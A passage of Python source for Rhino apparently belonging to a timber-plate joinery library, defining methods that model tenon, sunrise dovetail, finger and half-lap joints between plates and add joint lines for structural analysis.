point1 = rs.CopyObject(location[k], joint_plane.YAxis * tenon_width/2)
point4 = rs.CopyObject(location[k], -joint_plane.YAxis * tenon_width/2)
point2 = rs.CopyObject(point1, direction * new_tenon_length)
point3 = rs.CopyObject(point4, direction * new_tenon_length)
polyline = rs.AddPolyline([point1, point2, point3, point4, point1])
top_point = Toolbox.Curves.curve_closest_point(top_contour_male, joint_plane.Origin)
top_poly = rs.CopyObject(polyline, rs.VectorCreate(top_point, joint_plane.Origin))
bottom_point = Toolbox.Curves.curve_closest_point(bottom_contour_male, joint_plane.Origin)
bottom_poly = rs.CopyObject(polyline, rs.VectorCreate(bottom_point, joint_plane.Origin))
tenon_box = rs.coercebrep(Toolbox.Breps.box_from_2_poly(top_poly, bottom_poly))
"""
#slice joint
top_plane = rs.coerceplane(self.plates[i].top_plane)
bottom_plane = rs.coerceplane(self.plates[i].bottom_plane)
tenon_box = Toolbox.Breps.slice_2_planes(tenon_box, top_plane, bottom_plane)
"""
#append
self.plates[male].joints_positives.append(rs.coercebrep(rs.CopyObject(tenon_box)))
self.plates[female].joints_negatives.append(rs.coercebrep(rs.CopyObject(tenon_box)))
# update contour lines
for k in range(len(location)):
# male part
point1 = rs.CopyObject(location[k], joint_plane.YAxis * (tenon_width/2 + tenon_spacing/2))
point2 = rs.CopyObject(location[k], joint_plane.YAxis * tenon_width/2)
point5 = rs.CopyObject(location[k], -joint_plane.YAxis * tenon_width/2)
point6 = rs.CopyObject(location[k], -joint_plane.YAxis * (tenon_width/2 + tenon_spacing/2))
point3 = rs.CopyObject(point2, direction * new_tenon_length)
point4 = rs.CopyObject(point5, direction * new_tenon_length)
polyline = rs.AddPolyline([point2, point3, point4, point5])
top_point = Toolbox.Curves.curve_closest_point(top_contour_male, joint_plane.Origin)
top_poly = rs.CopyObject(polyline, rs.VectorCreate(top_point, joint_plane.Origin))
bottom_point = Toolbox.Curves.curve_closest_point(bottom_contour_male, joint_plane.Origin)
bottom_poly = rs.CopyObject(polyline, rs.VectorCreate(bottom_point, joint_plane.Origin))
self.plates[male].top_contour = Toolbox.Curves.insert_curves(self.plates[male].top_contour, [top_poly], top_contour_mstart)
self.plates[male].bottom_contour = Toolbox.Curves.insert_curves(self.plates[male].bottom_contour, [bottom_poly], bottom_contour_mstart)
# female part
mod = 0
if tenon_spacing < 0.0001 : mod = -1
point1 = rs.PolylineVertices(top_poly)[0 + mod]
point2 = rs.PolylineVertices(top_poly)[3 + mod]
point3 = rs.PolylineVertices(bottom_poly)[3 + mod]
point4 = rs.PolylineVertices(bottom_poly)[0 + mod]
point5 = rs.PolylineVertices(top_poly)[1 + mod]
point6 = rs.PolylineVertices(top_poly)[2 + mod]
point7 = rs.PolylineVertices(bottom_poly)[2 + mod]
point8 = rs.PolylineVertices(bottom_poly)[1 + mod]
top_poly = rs.AddPolyline([point1, point2, point3, point4, point1])
bottom_poly = rs.AddPolyline([point5, point6, point7, point8, point5])
self.plates[female].top_holes.append(rs.coercecurve(top_poly))
self.plates[female].bottom_holes.append(rs.coercecurve(bottom_poly))
self.log.append('Tenon joint added bewteen plates '+str(i)+ ' and '+ str(nb))
# Structural analysis
for k in range(len(location)):
pm=rs.CurveClosestPoint(self.FEM_plates[male],location[k])
pf=rs.CurveClosestPoint(self.FEM_plates[female],location[k])
self.FEM_plates[male] = scriptcontext.doc.Objects.Add(self.FEM_plates[male])
self.FEM_plates[female] = scriptcontext.doc.Objects.Add(self.FEM_plates[female])
joint_line = rs.AddLine(rs.EvaluateCurve(self.FEM_plates[male],pm), rs.EvaluateCurve(self.FEM_plates[female],pf))
rs.InsertCurveKnot(self.FEM_plates[male],pm)
rs.InsertCurveKnot(self.FEM_plates[female],pf)
self.FEM_plates[male] = rs.coercecurve(self.FEM_plates[male])
self.FEM_plates[female] = rs.coercecurve(self.FEM_plates[female])
self.FEM_joints.append(rs.coercecurve(joint_line))
pass
@__skip_nones
def add_sunrise(self,
plates_pairs='all',
tenon_number=2,
tenon_width=1.0,
tenon_spacing=1.0,
tenon_shift=0.0,
spread_angle=0.0,
parallel_tenons=False,
custom_insertion=None):
""" Add a sunrise dovetail on Edgewise contact zones."""
#cast plate_pairs to string
if plates_pairs != 'all':
for i in range(len(plates_pairs)):
plates_pairs[i] = str(plates_pairs[i])
#conditional loop
for i in range(self.count):
types = self.contact_types[i]
for j in range(len(types)):
nb = self.contact_ids[i][j]
# Specific selection function
if ((plates_pairs == 'all')
or ('('+str(i)+','+str(nb)+')' == plates_pairs)
or ('('+str(i)+','+str(nb)+')' in plates_pairs)
or ('('+str(nb)+','+str(i)+')' == plates_pairs)
or ('('+str(nb)+','+str(i)+')' in plates_pairs)):
i_want_a_tenon = True
else: i_want_a_tenon = False
# For all specified Edgewise connection
if (types[j] in 'SES') and (nb > i) and i_want_a_tenon is True:
# Prerequisite
if tenon_number < 1 : raise Exception('tenon_number must be greater than 1')
if tenon_width <= 0 : raise Exception('tenon_width must be greater than 0')
if tenon_spacing <= 0 : raise Exception('tenon_spacing must be greater than 0')
#deal with male/female
nb = self.contact_ids[i][j]
if types[j] == 'SE':
spread_angle=-spread_angle
male, female = i, nb
else: male, female = nb, i
#compute plane angles
angles = []
if parallel_tenons is True:
if tenon_number == 1: angles = [0,0]
else:
for k in range(tenon_number):
angles.append(- spread_angle + 2*k*spread_angle/(tenon_number-1))
angles.append(- spread_angle + 2*k*spread_angle/(tenon_number-1))
else:
for k in range(2*tenon_number):
angles.append(- spread_angle + 2*k*(spread_angle/(2*tenon_number-1)))
#tenon locations
cp = self.contact_planes[i][j]
if tenon_number > 1 :
dist = (float(tenon_number-1) /2) * (tenon_width + tenon_spacing)
pointA = rs.CopyObject(cp.Origin, cp.XAxis * dist)
pointB = rs.CopyObject(cp.Origin, -cp.XAxis * dist)
line = rs.AddLine(pointA, pointB)
shifted_line = rs.CopyObject(line, cp.XAxis * tenon_shift)
location = rs.DivideCurve(shifted_line, tenon_number-1)
else: location = [rs.CopyObject(cp.Origin, cp.XAxis * tenon_shift)]
#get insertion vector
vec = self.contact_vectors[i][j]
if custom_insertion != None: vec=custom_insertion
#get and reorder top/bottom
tpf = self.plates[female].top_plane
bpf = self.plates[female].bottom_plane
if rs.Distance(tpf.Origin, cp.Origin) < rs.Distance(bpf.Origin, cp.Origin):
self.switch_top_bottom(plates=[female])
tpm = self.plates[male].top_plane
bpm = self.plates[male].bottom_plane
tcf = self.plates[female].top_center
bcf = self.plates[female].bottom_center
if rs.Distance(tpm.Origin, bcf) < rs.Distance(bpm.Origin, bcf):
self.switch_top_bottom(plates=[male])
tpm = self.plates[male].top_plane
bpm = self.plates[male].bottom_plane
#create tenons
m_poly_top=[]
m_poly_bottom=[]
f_poly_top=[]
f_poly_bottom=[]
for k in range(tenon_number):
#plane_location
rot_vec_1 = rs.VectorRotate(cp.YAxis, angles[2*k], cp.ZAxis)
rot_vec_2 = rs.VectorRotate(cp.YAxis, angles[2*k+1], cp.ZAxis)
loc1= rs.CopyObject(location[k], cp.XAxis * tenon_width/2)
loc2= rs.CopyObject(location[k], cp.XAxis * -tenon_width/2)
pl1 = rs.PlaneFromFrame(loc1,vec,rot_vec_1)
pl2 = rs.PlaneFromFrame(loc2,vec,rot_vec_2)
if rs.IsVectorParallelTo(cp.YAxis, vec) !=0:
pl1 = rs.PlaneFromFrame(loc1,vec,cp.ZAxis)
pl2 = rs.PlaneFromFrame(loc2,vec,cp.ZAxis)
#solid creation
solid = rs.coercebrep(Toolbox.Breps.box_from_6_planes([pl1,pl2],[tpm,bpm],[tpf,bpf]))
if solid.SolidOrientation == rg.BrepSolidOrientation.Inward: rg.Brep.Flip(solid)
self.plates[male].joints_positives.append(copy.deepcopy(solid))
self.plates[female].joints_negatives.append(copy.deepcopy(solid))
#contour creation
m_poly_top.append(Toolbox.Planes.three_planes_intersection(bpf,tpm,pl1))
m_poly_top.append(Toolbox.Planes.three_planes_intersection(tpf,tpm,pl1))
m_poly_top.append(Toolbox.Planes.three_planes_intersection(tpf,tpm,pl2))
m_poly_top.append(Toolbox.Planes.three_planes_intersection(bpf,tpm,pl2))
m_poly_bottom.append(Toolbox.Planes.three_planes_intersection(bpf,bpm,pl1))
m_poly_bottom.append(Toolbox.Planes.three_planes_intersection(tpf,bpm,pl1))
m_poly_bottom.append(Toolbox.Planes.three_planes_intersection(tpf,bpm,pl2))
m_poly_bottom.append(Toolbox.Planes.three_planes_intersection(bpf,bpm,pl2))
f_poly_top.append(Toolbox.Planes.three_planes_intersection(tpm,tpf,pl1))
f_poly_top.append(Toolbox.Planes.three_planes_intersection(bpm,tpf,pl1))
f_poly_top.append(Toolbox.Planes.three_planes_intersection(bpm,tpf,pl2))
f_poly_top.append(Toolbox.Planes.three_planes_intersection(tpm,tpf,pl2))
f_poly_bottom.append(Toolbox.Planes.three_planes_intersection(tpm,bpf,pl1))
f_poly_bottom.append(Toolbox.Planes.three_planes_intersection(bpm,bpf,pl1))
f_poly_bottom.append(Toolbox.Planes.three_planes_intersection(bpm,bpf,pl2))
f_poly_bottom.append(Toolbox.Planes.three_planes_intersection(tpm,bpf,pl2))
self.plates[male].top_contour = Toolbox.Curves.insert_curves(self.plates[male].top_contour, [rs.AddPolyline(m_poly_top)])
self.plates[male].bottom_contour = Toolbox.Curves.insert_curves(self.plates[male].bottom_contour, [rs.AddPolyline(m_poly_bottom)])
self.plates[female].top_contour = Toolbox.Curves.insert_curves(self.plates[female].top_contour, [rs.AddPolyline(f_poly_top)])
self.plates[female].bottom_contour = Toolbox.Curves.insert_curves(self.plates[female].bottom_contour, [rs.AddPolyline(f_poly_bottom)])
# Structural analysis
for k in range(len(location)):
pm=rs.CurveClosestPoint(self.FEM_plates[male],location[k])
pf=rs.CurveClosestPoint(self.FEM_plates[female],location[k])
self.FEM_plates[male] = scriptcontext.doc.Objects.Add(self.FEM_plates[male])
self.FEM_plates[female] = scriptcontext.doc.Objects.Add(self.FEM_plates[female])
joint_line = rs.AddLine(rs.EvaluateCurve(self.FEM_plates[male],pm), rs.EvaluateCurve(self.FEM_plates[female],pf))
rs.InsertCurveKnot(self.FEM_plates[male],pm)
rs.InsertCurveKnot(self.FEM_plates[female],pf)
self.FEM_plates[male] = rs.coercecurve(self.FEM_plates[male])
self.FEM_plates[female] = rs.coercecurve(self.FEM_plates[female])
self.FEM_joints.append(rs.coercecurve(joint_line))
@__skip_nones
def add_fingers(self,
plates_pairs='all',
finger_number_1=2.0,
finger_length_1='default',
finger_width_1=1.0,
finger_number_2=2.0,
finger_length_2='default',
finger_width_2=1.0,
finger_spacing=0.0,
finger_shift=0.0,
mirror=False):
"""Add finger joints on Side-to-Side contact zones."""
#cast plate_pairs to string
if plates_pairs != 'all':
for i in range(len(plates_pairs)):
plates_pairs[i] = str(plates_pairs[i])
#conditional loop
for i in range(self.count):
types = self.contact_types[i]
for j in range(len(types)):
nb = self.contact_ids[i][j]
#specific selection function
if ((plates_pairs == 'all')
or ('('+str(i)+','+str(nb)+')' == plates_pairs)
or ('('+str(i)+','+str(nb)+')' in plates_pairs)):
i_want_a_finger = True
else: i_want_a_finger = False
#for all specified Side-to-Side connection
if (types[j] == 'SS') and (nb > i) and (i_want_a_finger is True):
#prerequisite
if finger_length_1 < 0 : raise Exception('finger_length_1 must be greater than 0')
if finger_length_2 < 0 : raise Exception('finger_length_2 must be greater than 0')
#joint location
zone = self.contact_zones[i][j]
rectangle = Toolbox.Curves.trapeze_to_rectangle(rs.JoinCurves(rs.DuplicateEdgeCurves(zone)))
if Toolbox.Curves.rectangle_dimensions(rectangle)[0] < (finger_width_1*finger_number_1 + finger_width_2*finger_number_2 + 2*finger_spacing*(finger_number_1+finger_number_2-1) + finger_shift*2):
excess = (finger_width_1*finger_number_1 + finger_width_2*finger_number_2 + 2*finger_spacing*(finger_number_1+finger_number_2-1) + finger_shift*2) / (Toolbox.Curves.rectangle_dimensions(rectangle)[0]) * 100
raise Exception(' Joint is to large ('+ str(int(excess)) +' %) for contact area between plate '+str(i)+' and plate '+str(nb))
plane_male = self.plates[i].top_plane
plane_female = self.plates[nb].top_plane
center = self.contact_centers[i][j]
joint_plane = rs.PlaneFromNormal(center, self.contact_planes[i][j].YAxis, self.contact_planes[i][j].XAxis)
#default length 1
if (finger_length_1 == 'default') or (finger_length_1 == 0) :
if abs(rs.IsVectorParallelTo(plane_male.ZAxis, plane_female.ZAxis)) == 0 and rs.IsVectorPerpendicularTo(plane_male.ZAxis, plane_female.ZAxis) is False:
alpha = rs.VectorAngle(plane_male.ZAxis, plane_female.ZAxis)
thickness_female = self.plates[nb].thickness
new_finger_length_1 = abs(thickness_female / math.sin(math.radians(180-alpha)))
else: new_finger_length_1 = self.plates[nb].thickness
else: new_finger_length_1 = finger_length_1
#default length 2
if (finger_length_2 == 'default') or (finger_length_2 == 0) :
if abs(rs.IsVectorParallelTo(plane_male.ZAxis, plane_female.ZAxis)) == 0 and rs.IsVectorPerpendicularTo(plane_male.ZAxis, plane_female.ZAxis) is False:
alpha = rs.VectorAngle(plane_male.ZAxis, plane_female.ZAxis)
thickness_male = self.plates[i].thickness
new_finger_length_2 = abs(thickness_male / math.sin(math.radians(180-alpha)))
else: new_finger_length_2 = self.plates[i].thickness
else: new_finger_length_2 = finger_length_2
#correct length projection
if abs(rs.IsVectorParallelTo(plane_male.ZAxis, joint_plane.ZAxis)) == 0:
beta = rs.VectorAngle(plane_male.ZAxis, joint_plane.ZAxis)
new_finger_length_1 = new_finger_length_1 * abs(math.cos(math.radians(beta)))
if abs(rs.IsVectorParallelTo(plane_female.ZAxis, joint_plane.ZAxis)) == 0:
beta = rs.VectorAngle(plane_female.ZAxis, joint_plane.ZAxis)
new_finger_length_2 = new_finger_length_2*abs(math.cos(math.radians(beta)))
#configuration (alternate or centered)
if (finger_number_1 + finger_number_2) % 2 == 0:
#alternate
if mirror is False:
center_1 = rs.CopyObject(joint_plane.Origin, joint_plane.XAxis * (finger_spacing + finger_width_2) /2)
center_2 = rs.CopyObject(joint_plane.Origin, -joint_plane.XAxis * (finger_spacing + finger_width_1) /2)
else:
center_1 = rs.CopyObject(joint_plane.Origin, -joint_plane.XAxis * (finger_spacing + finger_width_2) /2)
center_2 = rs.CopyObject(joint_plane.Origin, joint_plane.XAxis * (finger_spacing + finger_width_1) /2)
else:
#centered
center_1 = joint_plane.Origin
center_2 = joint_plane.Origin
#finger location - first side
if finger_number_1 > 1 :
dist = (float(finger_number_1 -1) /2) * (finger_width_1 + finger_width_2 + 2*finger_spacing)
pointA = rs.CopyObject(center_1, joint_plane.XAxis * dist)
pointB = rs.CopyObject(center_1, -joint_plane.XAxis * dist)
line = rs.AddLine(pointA, pointB)
shifted_line = rs.CopyObject(line, joint_plane.XAxis * finger_shift)
location_1 = rs.DivideCurve(shifted_line, finger_number_1 -1)
else: location_1 = [rs.CopyObject(center_1, joint_plane.XAxis * finger_shift)]
#finger location - second side
if finger_number_2 > 1 :
dist = (float(finger_number_2 -1) /2) * (finger_width_1 + finger_width_2 +2*finger_spacing)
pointA = rs.CopyObject(center_2, joint_plane.XAxis * dist)
pointB = rs.CopyObject(center_2, -joint_plane.XAxis * dist)
line = rs.AddLine(pointA, pointB)
shifted_line = rs.CopyObject(line, joint_plane.XAxis * finger_shift)
location_2 = rs.DivideCurve(shifted_line, finger_number_2 -1)
else: location_2 = [rs.CopyObject(center_2, joint_plane.XAxis * finger_shift)]
#solid - first side
for k in range(len(location_2)):
#base polyline
point1 = rs.coerce3dpoint(rs.CopyObject(location_2[k], joint_plane.XAxis * finger_width_2/2))
point4 = rs.coerce3dpoint(rs.CopyObject(location_2[k], -joint_plane.XAxis * finger_width_2/2))
point2 = rs.coerce3dpoint(rs.CopyObject(point1, joint_plane.YAxis * new_finger_length_2))
point3 = rs.coerce3dpoint(rs.CopyObject(point4, joint_plane.YAxis * new_finger_length_2))
polyline = [point1, point2, point3, point4, point1]
#projection for joint negative
proj_top_n = rg.Polyline(copy.deepcopy(polyline))
proj_top_n.Transform(rg.Transform.ProjectAlong(self.plates[i].top_plane, joint_plane.ZAxis))
proj_top_n =proj_top_n.ToArray()
proj_bottom_n = rg.Polyline(copy.deepcopy(polyline))
proj_bottom_n.Transform(rg.Transform.ProjectAlong(self.plates[i].bottom_plane, joint_plane.ZAxis))
proj_bottom_n = proj_bottom_n.ToArray()
finger_box_n = box = rg.Brep.CreateFromBox(proj_top_n[0:4] + proj_bottom_n[0:4])
self.plates[i].joints_negatives.append(finger_box_n)
#projection for joint positive
proj_top_p = rg.Polyline(copy.deepcopy(polyline))
proj_top_p.Transform(rg.Transform.ProjectAlong(self.plates[nb].top_plane, joint_plane.ZAxis))
proj_top_p =proj_top_p.ToArray()
proj_bottom_p = rg.Polyline(copy.deepcopy(polyline))
proj_bottom_p.Transform(rg.Transform.ProjectAlong(self.plates[nb].bottom_plane, joint_plane.ZAxis))
proj_bottom_p = proj_bottom_p.ToArray()
finger_box_p = box = rg.Brep.CreateFromBox(proj_top_p[0:4] + proj_bottom_p[0:4])
#if (finger_length_2 == 'default') or (finger_length_2 == 0) :
top_plane = rs.coerceplane(self.plates[i].top_plane)
bottom_plane = rs.coerceplane(self.plates[i].bottom_plane)
finger_box_p = Toolbox.Breps.slice_2_planes(finger_box_p, top_plane, bottom_plane)
self.plates[nb].joints_positives.append(finger_box_p)
# contour
top_poly_n = rs.AddPolyline([proj_top_n[0],proj_top_n[1], proj_top_n[2], proj_top_n[3]])
bottom_poly_n = rs.AddPolyline([proj_bottom_n[0],proj_bottom_n[1], proj_bottom_n[2], proj_bottom_n[3]])
top_poly_p = rs.AddPolyline([proj_top_p[0],proj_top_p[1], proj_top_p[2], proj_top_p[3]])
bottom_poly_p = rs.AddPolyline([proj_bottom_p[0],proj_bottom_p[1], proj_bottom_p[2], proj_bottom_p[3]])
self.plates[nb].top_contour = Toolbox.Curves.insert_curves(self.plates[nb].top_contour, [top_poly_p])
self.plates[nb].bottom_contour = Toolbox.Curves.insert_curves(self.plates[nb].bottom_contour, [bottom_poly_p])
self.plates[i].top_contour = Toolbox.Curves.insert_curves(self.plates[i].top_contour, [top_poly_n])
self.plates[i].bottom_contour = Toolbox.Curves.insert_curves(self.plates[i].bottom_contour, [bottom_poly_n])
#solid - second side
for k in range(len(location_1)):
#base polyline
point1 = rs.coerce3dpoint(rs.CopyObject(location_1[k], joint_plane.XAxis * finger_width_1/2))
point4 = rs.coerce3dpoint(rs.CopyObject(location_1[k], -joint_plane.XAxis * finger_width_1/2))
point2 = rs.coerce3dpoint(rs.CopyObject(point1, -joint_plane.YAxis * new_finger_length_1))
point3 = rs.coerce3dpoint(rs.CopyObject(point4, -joint_plane.YAxis * new_finger_length_1))
polyline = [point1, point2, point3, point4, point1]
#projection for joint negative
proj_top_n = rg.Polyline(copy.deepcopy(polyline))
proj_top_n.Transform(rg.Transform.ProjectAlong(self.plates[nb].top_plane, joint_plane.ZAxis))
proj_top_n =proj_top_n.ToArray()
proj_bottom_n = rg.Polyline(copy.deepcopy(polyline))
proj_bottom_n.Transform(rg.Transform.ProjectAlong(self.plates[nb].bottom_plane, joint_plane.ZAxis))
proj_bottom_n = proj_bottom_n.ToArray()
finger_box_n = box = rg.Brep.CreateFromBox(proj_top_n[0:4] + proj_bottom_n[0:4])
self.plates[nb].joints_negatives.append(finger_box_n)
#projection for joint positive
proj_top_p = rg.Polyline(copy.deepcopy(polyline))
proj_top_p.Transform(rg.Transform.ProjectAlong(self.plates[i].top_plane, joint_plane.ZAxis))
proj_top_p =proj_top_p.ToArray()
proj_bottom_p = rg.Polyline(copy.deepcopy(polyline))
proj_bottom_p.Transform(rg.Transform.ProjectAlong(self.plates[i].bottom_plane, joint_plane.ZAxis))
proj_bottom_p = proj_bottom_p.ToArray()
finger_box_p = box = rg.Brep.CreateFromBox(proj_top_p[0:4] + proj_bottom_p[0:4])
#if (finger_length_1 == 'default') or (finger_length_1 == 0) :
top_plane = rs.coerceplane(self.plates[nb].top_plane)
bottom_plane = rs.coerceplane(self.plates[nb].bottom_plane)
finger_box_p = Toolbox.Breps.slice_2_planes(finger_box_p, top_plane, bottom_plane)
self.plates[i].joints_positives.append(finger_box_p)
# contour
top_poly_n = rs.AddPolyline([proj_top_n[0],proj_top_n[1], proj_top_n[2], proj_top_n[3]])
bottom_poly_n = rs.AddPolyline([proj_bottom_n[0],proj_bottom_n[1], proj_bottom_n[2], proj_bottom_n[3]])
top_poly_p = rs.AddPolyline([proj_top_p[0],proj_top_p[1], proj_top_p[2], proj_top_p[3]])
bottom_poly_p = rs.AddPolyline([proj_bottom_p[0],proj_bottom_p[1], proj_bottom_p[2], proj_bottom_p[3]])
self.plates[i].top_contour = Toolbox.Curves.insert_curves(self.plates[i].top_contour, [top_poly_p])
self.plates[i].bottom_contour = Toolbox.Curves.insert_curves(self.plates[i].bottom_contour, [bottom_poly_p])
self.plates[nb].top_contour = Toolbox.Curves.insert_curves(self.plates[nb].top_contour, [top_poly_n])
self.plates[nb].bottom_contour = Toolbox.Curves.insert_curves(self.plates[nb].bottom_contour, [bottom_poly_n])
# Structural analysis
for k in range(len(location_1)):
pm=rs.CurveClosestPoint(self.FEM_plates[i],location_1[k])
pf=rs.CurveClosestPoint(self.FEM_plates[nb],location_1[k])
"""
self.FEM_plates[i] = scriptcontext.doc.Objects.Add(self.FEM_plates[i])
self.FEM_plates[nb] = scriptcontext.doc.Objects.Add(self.FEM_plates[nb])
joint_line = rs.AddLine(rs.EvaluateCurve(self.FEM_plates[i],pm), rs.EvaluateCurve(self.FEM_plates[nb],pf))
rs.InsertCurveKnot(self.FEM_plates[i],pm)
rs.InsertCurveKnot(self.FEM_plates[nb],pf)
self.FEM_plates[i] = rs.coercecurve(self.FEM_plates[i])
self.FEM_plates[nb] = rs.coercecurve(self.FEM_plates[nb])
self.FEM_joints.append(rs.coercecurve(joint_line))
for k in range(len(location_2)):
pm=rs.CurveClosestPoint(self.FEM_plates[i],location_2[k])
pf=rs.CurveClosestPoint(self.FEM_plates[nb],location_2[k])
self.FEM_plates[i] = scriptcontext.doc.Objects.Add(self.FEM_plates[i])
self.FEM_plates[nb] = scriptcontext.doc.Objects.Add(self.FEM_plates[nb])
joint_line = rs.AddLine(rs.EvaluateCurve(self.FEM_plates[i],pm), rs.EvaluateCurve(self.FEM_plates[nb],pf))
rs.InsertCurveKnot(self.FEM_plates[i],pm)
rs.InsertCurveKnot(self.FEM_plates[nb],pf)
self.FEM_plates[i] = rs.coercecurve(self.FEM_plates[i])
self.FEM_plates[nb] = rs.coercecurve(self.FEM_plates[nb])
self.FEM_joints.append(rs.coercecurve(joint_line))
"""
@__skip_nones
def add_halflap(self,
plates_pairs='all',
proportion = 0.5,
tolerance = 0.0,
min_angle = 45.0,
straight_height = 0.0,
fillet_height = 0.0,
segments = 1):
"""Add half-lap joints on Intersecting Plates."""
#cast plate_pairs to string
if plates_pairs != 'all':
for i in range(len(plates_pairs)):
plates_pairs[i] = str(plates_pairs[i])
#conditional loop
for i in range(self.count):
types = self.contact_types[i]
for j in range(len(types)):
nb = self.contact_ids[i][j]
#specific selection function
if ((plates_pairs == 'all')
or ('('+str(i)+','+str(nb)+')' == plates_pairs)
or ('('+str(i)+','+str(nb)+')' in plates_pairs)):
i_want_a_halflap = True
else: i_want_a_halflap = False
#for all specified Side-to-Side connection
if (types[j] == 'IN') and (nb > i) and (i_want_a_halflap is True):
#prerequisite
if proportion < 0.01 or proportion > 0.99: raise Exception(' Proportion should remain strictly between 0.01 and 0.99.')
if tolerance < 0 : raise Exception(' Tolerance should be higher than 0.0.')
if segments < 1: segments =1
# Solids
zone = self.contact_zones[i][j]
volume = rg.Brep.CreateBooleanIntersection(self.plates[i].brep,self.plates[nb].brep, 0.001)[0]
edges = Toolbox.Breps.brep_edges(volume)
edges.sort(key=rs.CurveLength)
edges.reverse()
vec_dir = Toolbox.Vectors.round_vector(rs.VectorUnitize(Toolbox.Vectors.cross(self.plates[i].top_normal, self.plates[nb].top_normal)),6)
four_edges = []
for edge in edges:
vec_line = Toolbox.Vectors.round_vector(rs.VectorUnitize(Toolbox.Vectors.line_to_vec(edge)),6)
if vec_dir == vec_line:
four_edges.append(edge)
elif vec_dir == rs.VectorReverse(vec_line):
rg.Curve.Reverse(edge)
four_edges.append(edge)
if len(four_edges) == 4: break
# Mid plane
mids = [rs.CurveMidPoint(four_edges[k]) for k in range(4)]
center = Toolbox.Points.average_point(mids)
proj = rs.coerce3dpointlist([rs.EvaluateCurve(four_edges[l],rs.CurveClosestPoint(four_edges[l],center)) for l in range(4)])
# Proportion parameter
d1 = rs.Distance(rs.CurveStartPoint(four_edges[0]), proj[0])
d2 = rs.Distance(rs.CurveStartPoint(four_edges[1]), proj[1])
d3 = rs.Distance(rs.CurveStartPoint(four_edges[2]), proj[2])
d4 = rs.Distance(rs.CurveStartPoint(four_edges[3]), proj[3])
min1 = min(d1,d2,d3,d4)
d5 = rs.Distance(rs.CurveEndPoint(four_edges[0]), proj[0])
d6 = rs.Distance(rs.CurveEndPoint(four_edges[1]), proj[1])
d7 = rs.Distance(rs.CurveEndPoint(four_edges[2]), proj[2])
d8 = rs.Distance(rs.CurveEndPoint(four_edges[3]), proj[3])
min2 = min(d5,d6,d7,d8)
poly = rs.AddPolyline(rs.PolylineVertices(gh.ConvexHull(proj, rs.PlaneFitFromPoints(proj))[0]))
vec1 = rs.VectorUnitize(rs.VectorCreate(rs.CurveStartPoint(four_edges[0]), proj[0]))
polyAt0 = rs.CopyObject(poly, min1*vec1)
poly = rs.CopyObject(polyAt0, proportion*(min1+min2)*rs.VectorUnitize(-vec1))
# Cutting volume in pieces
cutter = rs.coercebrep(rs.AddPlanarSrf(poly))
pieces = rs.SplitBrep(volume, cutter)
for piece in pieces: piece = rs.CapPlanarHoles(piece)
int_i = rs.CurveBrepIntersect(self.plates[i].top_contour, pieces[0])
int_nb = rs.CurveBrepIntersect(self.plates[nb].top_contour, pieces[0])
if int_i != None:
if int_nb != None:
if rs.CurveLength(int_i[0]) < rs.CurveLength(int_nb[0]):
pieces.reverse()
else: pieces.reverse()
# Fabrication lines
piece_i_top = Toolbox.Curves.curve_difference(rs.IntersectBreps(pieces[0], self.plates[i].top_face)[0], self.plates[i].top_contour)
piece_i_bottom = Toolbox.Curves.curve_difference(rs.IntersectBreps(pieces[0], self.plates[i].bottom_face)[0], self.plates[i].bottom_contour)
piece_nb_top = Toolbox.Curves.curve_difference(rs.IntersectBreps(pieces[1], self.plates[nb].top_face)[0], self.plates[nb].top_contour)
piece_nb_bottom = Toolbox.Curves.curve_difference(rs.IntersectBreps(pieces[1], self.plates[nb].bottom_face)[0], self.plates[nb].bottom_contour)
# Chamfer
if tolerance != 0:
if not 0 < min_angle < 90 : raise Exception(' The angle of the slope should remain strictly between 0 and 90.')
radius = fillet_height/math.sin(math.radians(90-min_angle))
fillet_width = radius - math.sqrt((radius*radius)-(fillet_height*fillet_height))
if fillet_width > tolerance: raise Exception(' Fillet height is to big according to the tolerance you specified.')
#polyline vertices without chamfer
pv_i_top = rs.CullDuplicatePoints(rs.PolylineVertices(piece_i_top),0.01)
pv_i_bottom = rs.CullDuplicatePoints(rs.PolylineVertices(piece_i_bottom),0.01)
pv_nb_top = rs.CullDuplicatePoints(rs.PolylineVertices(piece_nb_top),0.01)
pv_nb_bottom = rs.CullDuplicatePoints(rs.PolylineVertices(piece_nb_bottom),0.01)
#chamfer planes
chamfer_planes = []
chamfer_planes.append(rs.PlaneFromPoints(pv_i_top[1],pv_i_top[2],pv_i_top[0]))
chamfer_planes.append(rs.PlaneFromPoints(pv_i_top[2],pv_i_top[1],pv_i_top[3]))
chamfer_planes.append(rs.PlaneFromPoints(pv_i_bottom[2],pv_i_bottom[1],pv_i_bottom[3]))
chamfer_planes.append(rs.PlaneFromPoints(pv_i_bottom[1],pv_i_bottom[2],pv_i_bottom[0]))
chamfer_planes.append(rs.PlaneFromPoints(pv_nb_top[1],pv_nb_top[2],pv_nb_top[0]))
chamfer_planes.append(rs.PlaneFromPoints(pv_nb_top[2],pv_nb_top[1],pv_nb_top[3]))
chamfer_planes.append(rs.PlaneFromPoints(pv_nb_bottom[2],pv_nb_bottom[1],pv_nb_bottom[3]))
chamfer_planes.append(rs.PlaneFromPoints(pv_nb_bottom[1],pv_nb_bottom[2],pv_nb_bottom[0]))
contours = [self.plates[i].top_contour, self.plates[i].bottom_contour, self.plates[nb].top_contour, self.plates[nb].bottom_contour]
#chamfer geometry
chamfer_sides = []
chamfer_faces = []
int_contour = []
for k in range(len(chamfer_planes)):
cp = chamfer_planes[k]
#new joint polyline
point_A = cp.Origin #origin
point_B = rs.CopyObject(point_A, straight_height * cp.YAxis) #before fillet
point_C = rs.CopyObject(point_B, rs.VectorAdd(fillet_height * cp.YAxis, -fillet_width * cp.XAxis)) #after fillet
point_D = rs.CopyObject(point_C, rs.VectorAdd( (tolerance - fillet_width) * math.tan(math.radians(min_angle)) * cp.YAxis, -(tolerance - fillet_width) * cp.XAxis))
point_E = rs.CopyObject(point_D, 100*cp.YAxis)
chamfer_side = [point_A]
if fillet_height > 0:
fillet = Toolbox.Curves.fillet_curves(rs.AddLine(point_A,point_B), rs.AddLine(point_C,point_D), radius, False)
discreet = rs.DivideCurve(fillet, segments)
for point in discreet:
chamfer_side.append(point)
else:
chamfer_side.append(rg.Point3d(rs.PointCoordinates(point_C)))
chamfer_side.append(rg.Point3d(rs.PointCoordinates(point_D)))
chamfer_side.append(rg.Point3d(rs.PointCoordinates(point_E)))
chamfer_sides.append(rs.AddPolyline(chamfer_side))
#new joint brep
if k%2 == 1:
chamfer_faces.append(Toolbox.Curves.connect_curves(chamfer_sides[k-1],chamfer_sides[k]))
